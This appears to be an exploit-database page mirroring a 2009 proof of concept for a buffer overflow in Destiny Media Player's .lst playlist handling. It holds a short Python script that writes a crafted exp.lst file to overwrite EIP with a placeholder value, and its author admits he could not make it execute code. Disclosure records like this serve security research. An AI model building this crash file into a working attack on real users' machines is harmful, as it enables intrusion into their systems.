header-logo
Suggest Exploit
vendor:
Destiny Media Player
by:
Encrypt3d.M!nd
8.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Destiny Media Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Destiny Media Player (lst file) Buffer overflow PoC

A proof-of-concept exploit for a buffer overflow vulnerability in Destiny Media Player was released by Encrypt3d.M!nd. The exploit creates a malicious .lst file containing a large number of 'A' characters followed by a 4-byte EIP value, followed by more 'A' characters. If the file is opened in Destiny Media Player, the EIP value will be overwritten, potentially allowing arbitrary code execution.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

#
# Destiny Media Player (lst file) Buffer overflow PoC
# By:Encrypt3d.M!nd
# I'am Iraqian...Not Arabian
###########################################
#  Well,i've tried to write an exploit for this shit but i couldn't
# the address after the NEW eip will over written,if anyone
# knows how to exploit this,be my guest

chars = "A"*2052
eip = "\x42\x42\x42\x42" # the eip will become 42424242

file=open('exp.lst','w')
file.write(chars+eip+chars)
file.close()

# milw0rm.com [2009-01-03]

Navigation

Suggest Exploit

Services By CQR